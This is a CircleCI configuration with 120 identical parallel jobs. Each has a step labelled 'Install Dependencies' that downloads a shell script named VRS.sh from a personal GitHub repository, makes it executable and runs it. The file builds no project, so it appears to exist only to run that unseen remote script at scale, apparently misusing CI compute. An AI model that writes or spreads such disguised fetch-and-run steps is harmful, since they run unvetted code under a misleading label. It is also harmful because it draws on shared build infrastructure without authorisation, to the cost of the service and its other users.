version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku81:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku82:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku83:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku84:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku85:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku86:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku87:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku88:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku89:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku90:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku91:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku92:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku93:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku94:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku95:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku96:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku97:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku98:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku99:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku100:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku101:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku102:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku103:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku104:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku105:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku106:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku107:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku108:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku109:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku110:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku111:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku112:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku113:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku114:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku115:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku116:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku117:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku118:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku119:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku120:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/nabila/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
            - aku31
            - aku32
            - aku33
            - aku34
            - aku35
            - aku36
            - aku37
            - aku38
            - aku39
            - aku40
            - aku41
            - aku42
            - aku43
            - aku44
            - aku45
            - aku46
            - aku47
            - aku48
            - aku49
            - aku50
            - aku51
            - aku52
            - aku53
            - aku54
            - aku55
            - aku56
            - aku57
            - aku58
            - aku59
            - aku60
            - aku61
            - aku62
            - aku63
            - aku64
            - aku65
            - aku66
            - aku67
            - aku68
            - aku69
            - aku70
            - aku71
            - aku72
            - aku73
            - aku74
            - aku75
            - aku76
            - aku77
            - aku78
            - aku79
            - aku80
            - aku81
            - aku82
            - aku83
            - aku84
            - aku85
            - aku86
            - aku87
            - aku88
            - aku89
            - aku90
            - aku91
            - aku92
            - aku93
            - aku94
            - aku95
            - aku96
            - aku97
            - aku98
            - aku99
            - aku100
            - aku101
            - aku102
            - aku103
            - aku104
            - aku105
            - aku106
            - aku107
            - aku108
            - aku109
            - aku110
            - aku111
            - aku112
            - aku113
            - aku114
            - aku115
            - aku116
            - aku117
            - aku118
            - aku119
            - aku120